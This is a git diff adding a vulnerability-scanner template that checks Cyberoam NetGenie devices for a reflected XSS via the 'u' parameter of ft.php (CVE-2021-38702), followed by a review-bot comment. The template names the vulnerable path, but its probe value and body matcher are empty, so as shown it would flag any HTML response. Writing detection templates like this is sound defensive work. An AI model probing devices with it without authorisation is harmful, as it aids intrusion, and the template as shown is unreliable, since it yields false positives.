diff --git a/cves/2021/CVE-2021-38702.yaml b/cves/2021/CVE-2021-38702.yaml
new file mode 100644
index 0000000000..a662c79f19
--- /dev/null
+++ b/cves/2021/CVE-2021-38702.yaml
@@ -0,0 +1,24 @@
+id: CVE-2021-38702
+
+info:
+ name: Cyberoam NetGenie XSS
+ description: Cyberoam NetGenie C0101B1-20141120-NG11VO devices through 2021-08-14 allow for reflected Cross Site Scripting via the 'u' parameter of ft.php.
+ reference: https://seclists.org/fulldisclosure/2021/Aug/20
+ author: geeknik
+ severity: medium
+ tags: cve,cve2021,cyberoam,netgenie,xss
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/tweb/ft.php?u="
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ - type: word
+ words:
+ - "text/html"
+ part: header
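Review bot: The first word matcher is the empty string `""` and the request path ends at `u=` with no value, so as shown the body check matches every response and the template would report any host that answers this path with `text/html` in a header. The marker may simply have been stripped when this page was rendered, but if the file really looks like this, the matcher must hold the exact marker string sent in `u`, and it should state `part: body` explicitly rather than rely on the default. A status matcher (`- type: status` with `status:` and `- 200`) would further cut false positives from redirects and generic error pages. The header matcher would also be tighter if it targeted the Content-Type value specifically, since `text/html` can appear in other response headers.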